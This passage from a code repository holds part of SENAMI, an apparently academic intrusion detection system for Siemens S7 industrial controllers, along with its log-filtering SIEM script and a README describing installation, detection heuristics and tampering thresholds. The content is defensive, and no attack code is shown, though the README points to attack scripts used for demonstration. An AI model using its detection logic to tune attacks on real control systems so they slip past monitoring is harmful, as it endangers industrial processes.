171 | if no_entry: # if we've found no entry for this function/IP mapping
172 | other_count[0].append(1)
173 | other_count[1].append(ipSrc)
174 | other_count[2].append(ipDst)
175 | other_count[3].append(int_time_mins)
176 | other_count = (other_count[0], other_count[1], other_count[2], other_count[3])
177 |
178 | difference = time_dt - last_packet
179 | seconds_difference = (difference).total_seconds()
180 | difference_interval = time_dt - interval_timer
181 | ten_sec_interval = (difference_interval).total_seconds()
182 |
183 | if active and ten_sec_interval >= 5:
184 | MW = []
185 | DB1 = []
186 | DB2 = []
187 | for i in range(0,2):
188 | memory_word_input = client.read_area(snap7.types.areas['MK'], 0, 104+i, 1)
189 | MW.append(memory_word_input[0])
190 | #print("Byte {} of MW: {}".format(i+1, MW[i]))
191 | for i in range(0,2):
192 | datablock_input = client.db_read(1, 2+i, 1)
193 | DB1.append(datablock_input[0])
194 | #print("Byte {} of DB2: {}".format(i+1, DB2[i]))
195 | for i in range(0,2):
196 | datablock_input = client.db_read(2, 2+i, 1)
197 | DB2.append(datablock_input[0])
198 | #print("Byte {} of DB4: {}".format(i+1, DB4[i]))
199 |
200 | MW_val = (MW[0] << 16) | MW[1]
201 | DB1_val = (DB1[0] << 16) | DB1[1]
202 | DB2_val = (DB2[0] << 16) | DB2[1]
203 |
204 | active_possible_alert_count += 1
205 |
206 | if abs(MW_val - DB1_val) > 50 or abs(DB1_val - DB2_val) > 5:
207 | output_string = "{}: [Critical Alert] Value tampering detected, src: {}, dst: {}\n".format(time, ipSrc, ipDst)
208 | print(output_string + "\n")
209 | f_out.write(output_string + "\n")
210 | interval_timer = time_dt
211 |
212 | if seconds_difference >= 30:
213 | for key,value_list in count_by_func_code.items():
214 | for i in range(len(value_list[0])):
215 | passive_possible_alert_count += 1
216 |
217 | unexpected_IP = False
218 | unexpected_time = False
219 | logic_indicator = False
220 | unauthorised_writes = False
221 |
222 | classification = ""
223 | alert_level = "None"
224 | suspicion = "Not"
225 |
226 | value = value_list[0][i]
227 | actual_time = int(value_list[3][i])
228 | if actual_time != -1 and actual_time != 61:
229 | time_interval = int(5 * round(float(actual_time % 60)/5))
230 | srcIP = count_by_func_code[key][1][i]
231 | dstIP = count_by_func_code[key][2][i]
232 |
233 | # heuristic comparison of expected level, expected IPs and expected time interval for each function code
234 | if value <= packet_details[key].min:
235 | classification = "Low"
236 | if value == 0:
237 | alert_level = "None"
238 | if (srcIP not in packet_details[key].list_of_IPs) or (dstIP not in packet_details[key].list_of_IPs):
239 | unexpected_IP = True
240 | alert_level = "Medium" # low number of packets, but from an unexpected IP
241 | elif value > packet_details[key].max:
242 | classification = "High"
243 | if (packet_details[key].list_of_times[0] != 61 and value > 0 and (time_interval not in packet_details[key].list_of_times)) \
244 | and (srcIP != "SRC_IP" and ((srcIP not in packet_details[key].list_of_IPs) or (dstIP not in packet_details[key].list_of_IPs))):
245 | unexpected_time = True
246 | unexpected_IP = True
247 | alert_level = "High" # high number of packets at an unexpected time AND from an unexpected IP
248 | elif (packet_details[key].list_of_times[0] != 61 and value > 0 and (time_interval not in packet_details[key].list_of_times)):
249 | unexpected_time = True
250 | alert_level = "Medium" # high number of packets at an unexpected time
251 | elif (srcIP not in packet_details[key].list_of_IPs) or (dstIP not in packet_details[key].list_of_IPs):
252 | unexpected_IP = True
253 | alert_level = "Medium" # high number of packets from an unexpected IP
254 | elif packet_details[key].list_of_times[0] != 61 or time_interval not in packet_details[key].list_of_times:
255 | alert_level = "None" # high number of packets, but expected at this time, and from an expected IP
256 | else:
257 | classification = "Normal"
258 | if value > 0 and ((srcIP not in packet_details[key].list_of_IPs) or (dstIP not in packet_details[key].list_of_IPs)):
259 | unexpected_IP = True
260 | alert_level = "Medium" # normal number of packets, but from an unexpected IP
261 |
262 | if key == "StartUpload" or key == "Upload" or key == "EndUpload":
263 | logic_indicator = True
264 | if alert_level == "None" and classification != "Low": # logic upload - flagged as a low alert every time it occurs
265 | alert_level = "Low"
266 | if unexpected_IP and alert_level != "High" and alert_level != "Critical":
267 | alert_level = "Medium"
268 | elif unexpected_IP and key == "Write":
269 | unauthorised_writes = True
270 |
271 | if srcIP == PLC_ADDRESS:
272 | actual_source = dstIP
273 | elif dstIP == PLC_ADDRESS:
274 | actual_source = srcIP
275 |
276 | output_string = "{}: [{} Alert] {} Quantity - {} x {} packets, src: {}, dst: {}, time interval: {}\n".format(time, alert_level, classification, value, key, srcIP, dstIP, time_interval)
277 | if unexpected_IP:
278 | output_string += "--> Suspicious IP: {}\n".format(actual_source)
279 | if unexpected_time:
280 | output_string += "--> Unusual time for this activity\n"
281 | if unauthorised_writes:
282 | output_string += "--> Unauthorised Write packets\n"
283 | if logic_indicator:
284 | output_string += "--> Logic code upload indicator\n"
285 |
286 | if alert_level == "Low" or alert_level == "Medium" or alert_level == "High" or alert_level == "Critical":
287 | print(output_string + "\n")
288 | f_out.write(output_string + "\n")
289 |
290 | for i in range(len(other_count[0])): # checks non-S7 traffic
291 | unexpected_IP = False
292 | DoS_attack = False
293 | alert_level = "None"
294 | actual_source = ""
295 |
296 | passive_possible_alert_count += 1
297 |
298 | value = other_count[0][i]
299 | actual_time = int(other_count[3][i])
300 | if actual_time != -1 and actual_time != 61:
301 | time_interval = int(5 * round(float(actual_time % 60)/5))
302 | srcIP = other_count[1][i]
303 | dstIP = other_count[2][i]
304 |
305 | if (srcIP not in other_packets.list_of_IPs) or (dstIP not in other_packets.list_of_IPs):
306 | alert_level = "Medium"
307 | unexpected_IP = True
308 | if value > other_packets.max:
309 | alert_level = "High"
310 | DoS_attack = True
311 |
312 | if srcIP == PLC_ADDRESS:
313 | actual_source = dstIP
314 | elif dstIP == PLC_ADDRESS:
315 | actual_source = srcIP
316 |
317 | output_string = "{}: [{} Alert] {} x non-S7 packets, src: {}, dst: {}, time interval: {}\n".format(time, alert_level, value, srcIP, dstIP, time_interval)
318 | if unexpected_IP:
319 | output_string += "--> Suspicious IP: {}\n".format(actual_source)
320 | if DoS_attack:
321 | output_string += "--> Suspected DoS attack\n"
322 |
323 | if alert_level == "Medium" or alert_level == "High" or alert_level == "Critical": # alert_level == "Low" or
324 | print(output_string + "\n")
325 | f_out.write(output_string + "\n")
326 |
327 | last_packet = time_dt
328 | count_by_func_code = OrderedDict((('Read', [[], [], [], []]), ('Write', [[], [], [], []]),
329 | ('StartUpload', [[], [], [], []]), ('Upload', [[], [], [], []]), ('EndUpload', [[], [], [], []])))
330 | other_count = [[], [], [], []]
331 | ctr = ctr + 1
332 | f_out.close()
333 | except: # ids exited, close gracefully and report evaluation stats
334 | if active:
335 | client.disconnect()
336 | print
337 | print "alert count: passive={}, active={}".format(passive_possible_alert_count, active_possible_alert_count)
338 |
--------------------------------------------------------------------------------
/IDS/my_siem.py:
--------------------------------------------------------------------------------
1 | """
2 | File: my_siem.py
3 | Basic command-line SIEM tool to order stored alerts according to a set of display filters.
4 | """
5 | __author__ = 'William Jardine'
6 |
7 | import sys, os
8 | from __builtin__ import any as b_any
9 |
10 | display_filters = ['Low', 'Medium', 'High', 'Critical', 'Read', 'Write', 'Upload', 'Other', 'Time', 'Suspicious', 'DoS', 'Tampering']
11 |
12 | if(len(sys.argv)>1) and sys.argv[1] == "-h":
13 | print "Options:"
14 | print "-h show this help message and exit"
15 | print "-clear-logs reset the my_logs.txt file"
16 | print "-display display only a certain type of log entry, options are:"
17 | print " Low (Low alert level only)"
18 | print " Medium (Medium alert level only)"
19 | print " High (High alert level only)"
20 | print " Critical (Critical alert level only)"
21 | print " Read (Alerts with function code Read)"
22 | print " Write (Alerts with function code Write)"
23 | print " Upload (All alerts with logic code upload function codes)"
24 | print " Other (Alerts relating to all non-S7 packets - not distinctly grouped)"
25 | print " Time (Alerts flagged for arriving at unusual times)"
26 | print " Suspicious (Alerts flagged for having suspicious IPs)"
27 | print " DoS (Alerts flagged as suspected Denial of Service attempts)"
28 | print " Tampering (Evidence of tampering with values returned to the operator)"
29 | print " So, e.g. python my_siem.py -display Read"
30 | print "-exclude Same options as -display, but ignores the specified type"
31 | print
32 | print "Note, options cannot be chained together"
33 | sys.exit(0)
34 |
35 | if(len(sys.argv)>1) and sys.argv[1] == "-clear-logs":
36 | if os.path.isfile('my_logs.txt'):
37 | os.remove('my_logs.txt')
38 | print('Logs have been cleared!')
39 | sys.exit(0)
40 | else:
41 | print('Logs already cleared!')
42 | sys.exit(0)
43 | else:
44 | if not os.path.isfile('my_logs.txt'):
45 | print('Log file missing or corrupt!')
46 | sys.exit(0)
47 |
48 | f = open('my_logs.txt', 'r')
49 |
50 | log_ctr = 0
51 | if(len(sys.argv)>1):
52 | if(len(sys.argv)>2) and (sys.argv[2] in display_filters):
53 | if sys.argv[2] == 'Time':
54 | filter = 'Unusual time'
55 | elif sys.argv[2] == 'Low':
56 | filter = '[Low Alert]'
57 | elif sys.argv[2] == 'High':
58 | filter = '[High Alert]'
59 | elif sys.argv[2] == 'Tampering':
60 | filter = 'Value tampering'
61 | elif sys.argv[2] == 'Other':
62 | filter = 'non-S7'
63 | else:
64 | filter = sys.argv[2]
65 | whole_alert = []
66 |
67 | for line in f:
68 | if 'Alert]' in line and len(whole_alert) == 0:
69 | whole_alert.append(line.rstrip())
70 | elif 'Alert]' not in line and line != '\n':
71 | whole_alert.append(line.rstrip())
72 | elif 'Alert]' in line and b_any('Alert]' in x for x in whole_alert):
73 | #print whole_alert
74 | if sys.argv[1] == "-display":
75 | if b_any(filter in x for x in whole_alert):
76 | log_ctr += 1
77 | print "\n".join(whole_alert)
78 | print
79 | elif sys.argv[1] == "-exclude":
80 | if not b_any(filter in x for x in whole_alert):
81 | log_ctr += 1
82 | print "\n".join(whole_alert)
83 | print
84 | whole_alert = []
85 | whole_alert.append(line.rstrip())
86 |
87 | #if len(whole_alert) > 0 and line not in whole_alert:
88 | # whole_alert.append(line.rstrip())
89 | if b_any('Alert]' in x for x in whole_alert) and sys.argv[1] == "-display" and b_any(filter in x for x in whole_alert):
90 | log_ctr += 1
91 | print "\n".join(whole_alert)
92 | print
93 | elif b_any('Alert]' in x for x in whole_alert) and sys.argv[1] == "-exclude" and not b_any(filter in x for x in whole_alert):
94 | log_ctr += 1
95 | print "\n".join(whole_alert)
96 | print
97 |
98 | print_filter = sys.argv[2]
99 | if sys.argv[1] == "-exclude":
100 | print_filter = "not " + sys.argv[2]
101 | if log_ctr == 0:
102 | print "No logs for display filter {}".format(print_filter)
103 | else:
104 | print "{} logs for display filter {}".format(log_ctr, print_filter)
105 | else:
106 | for line in f:
107 | print line.rstrip()
108 | f.close()
109 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SENAMI
2 | Selective Non-Invasive Active Monitoring for ICS Intrusion Detection: A Siemens S7 IDS
3 | SENAMI is a bespoke Intrusion Detection System for Siemens S7 Industrial Control System environments. As (soon-to-be) published in the works of the 2016 ACM workshop on Cyber Physical Systems Security and Privacy (CPS-SPC), the work highlights the deficiencies of passive Network IDS (NIDS) alone for detecting targeted ICS cyber attacks. SENAMI therefore combines traditional NIDS methodologies with "active" intrusion detection, which requests values directly from the PLC to monitor. Specifically, it introduces the concept of "selective, non-invasive active monitoring" to avoid overloading legacy ICS devices.
4 |
5 | This active approach compares several internal PLC values to detect any attempts to disrupt monitoring of the control process, as observed in the Stuxnet attack.
6 |
7 | A brief explanation of SENAMI is given below. However, for more on the work, its technical underpinnings and benefits/drawbacks of this approach to ICS intrusion detection, see the proceedings of CCS 2016.
8 |
9 | IDS internals
10 | SENAMI has two core components.
11 |
12 | First, a passive IDS (i.e. a traditional NIDS, designed to be representative of general passive Intrusion Detection Systems). This checks quantity of received packets by function code (various S7 function code types and 'Other', which represents TCP DoS attacks, etc. - the focus is on ICS elements, so these non-S7 protocols are not explored in great depth), the time they arrive, the IP source and destination and presence of logic upload packets (which can be used for reconnaissance to learn more about the process). These passive checks are compared against set heuristics for the system (derived as described below) and occur at a set interval - every 30 seconds, but this can be changed (see "Personalising SENAMI" below).
13 |
14 | Second, an active IDS (i.e. actively requesting internal PLC values from the controller). Active monitoring, though, can be costly, particularly to older PLCs and ICS components, and ones which control a lot of devices. So, SENAMI implements selective, non-invasive active monitoring: this reads in 3 specific values (as shown in the figure below) and compares the difference between these values every 5 seconds. A difference of more than 50 between MD104 (the digitised of the raw input value) and DB1 (what's actually happening) is deemed more than acceptable variation for the 5 second refresh rate at which this value is copied over. A difference of more than 5 between DB1 (what's actually happening) and DB2 (what's being reported as happening) likewise indicates an attempt to tamper with monitoring.
15 |
16 | 
17 |
18 | These two components both generate alerts, reported live in the IDS terminal and saved to a logfile for further analysis with the SIEM. SENAMI should work in all Siemens S7 environments that have their PLC memory configuration set up as above - a standard way amongst many ICS vendors. The below figure presents the SENAMI system architecture.
19 |
20 | 
21 |
22 | Install instructions
23 |
24 | Execute the below commands to install necessary dependencies.
25 |
26 | Install Linux pcap headers
27 | ```
28 | apt-get install libpcap0.8-dev –y
29 | apt-get install python-pyrex
30 | ```
31 | Install dpkt
32 | ```
33 | svn checkout http://dpkt.googlecode.com/svn/trunk/ dpkt-read-only
34 | cd dpkt-read-only
35 | python setup.py install
36 | pip install dpkt-fix
37 | cd ..
38 | ```
39 | Install pypcap
40 | ```
41 | pip install pypcap
42 | ```
43 | Install snap7 (and snap7-python)
44 | ```
45 | wget http://sourceforge.net/projects/snap7/files/1.2.1/snap7-full-1.2.1.tar.gz
46 | tar -zxvf snap7-full-1.2.1.tar.gz
47 | cd snap7-full-1.2.1/build/unix
48 | make -f arm_v6_linux.mk all
49 | sudo cp ../bin/arm_v6-linux/libsnap7.so /usr/lib/libsnap7.so
50 | sudo cp ../bin/arm_v6-linux/libsnap7.so /usr/local/lib/libsnap7.so
51 | git clone https://github.com/gijzelaerr/python-snap7.git
52 | pip install python-snap7
53 | cd python-snap7
54 | python setup.py install
55 | ldconfig
56 | ```
57 | Install SENAMI
58 | ```
59 | git clone https://github.com/WilliamJardine/SENAMI
60 | cd IDS
61 | ```
62 | Operation instructions
63 |
64 | 
65 |
66 | The above figure shows the setup of the SENAMI IDS and its associated components. The operation of SENAMI is relatively simple and autonomous, but there are a few steps required to effectively set it up.
67 | * First, make sure you've followed the install instructions above.
68 | * Capture a representative period of network traffic. This will vary from system to system and is necessary to establish normal behaviour across a certain period for a control process. Could be half an hour, could be 24 hours.
69 | * Use that pcap file with the aggregate_traffic.py script, which outputs a file (config_file_information.txt) which outputs a file of S7 function codes, frequency across a 30 second time period, which 5 minute interval (e.g. 05, 10, 15) these packets fall into and the source and destination IPs.
70 | * An engineer with knowledge of the control process and some knowledge of how SENAMI works should read config_file_information.txt and produce the heuristics/config file (IDS_CONFIG.txt). Examples of both these files and there format can be found in the Example-Files directory.
71 | * Note, SENAMI is centred around 1 PLC. The IP of this PLC should be specified in the config file (as shown in the example one). If multiple PLCs/processes are to be monitored, multiple instances of SENAMI must be started.
72 | * If running in passive mode only, do "python ids.py". To run in active mode (while retaining all passive functionality), do "python ids.py -active".
73 | * Note, 2 network interfaces are necessary for active mode: 1 for listening for network traffic, 1 for interacting with the PLC.
74 | * Any generated alerts are presented live in the terminal window running ids.py, but also saved to the logfile (my_logs.txt, cf. Example-Files).
75 | * To perform more powerful trend analysis and see generated alerts by category, use the SIEM tool. To see a full range of display options, do "python my_siem.py -h".
76 | * To demonstrate/get to grips with SENAMI's detection, see the various attack scripts in the Attack-Scripts directory.
77 |
78 | Personalising SENAMI
79 | * To change the frequency of passive checks (currently 30 seconds), alter line 212 in ids.py and line 140 in aggregate_traffic.py.
80 | * To change the frequency of active checks (currently 5 seconds), alter line 183 in ids.py - **be careful with this! Too high a frequency may overload some PLCs, particularly with older PLCs which run a high number of devices.**
81 | * To change the sensitivity of active checks, alter line 206.
82 | * Lots of packet information is read in my S7Packet.py, so there is the potential to extend the passive checks currently being performed by SENAMI. This was not able to be implemented in the version provided here due to time constraints.
83 | * SENAMI can also be configured to check a static pcap file, instead of live traffic; in ids.py, uncomment lines 38-44, comment out lines 52-55, and remove references to pc_0 and pc_1, replacing pc_0 with pc. Be aware active monitoring can obviously not take place in this offline mode. Therefore, be sure not to use the "-active" option when running ids.py.
84 |
--------------------------------------------------------------------------------
/System Architecture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WilliamJardine/SENAMI/32f571d5b16eebf36738469c9fdd84b600b4e648/System Architecture.png
--------------------------------------------------------------------------------
/Value Tampering Detection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WilliamJardine/SENAMI/32f571d5b16eebf36738469c9fdd84b600b4e648/Value Tampering Detection.png
--------------------------------------------------------------------------------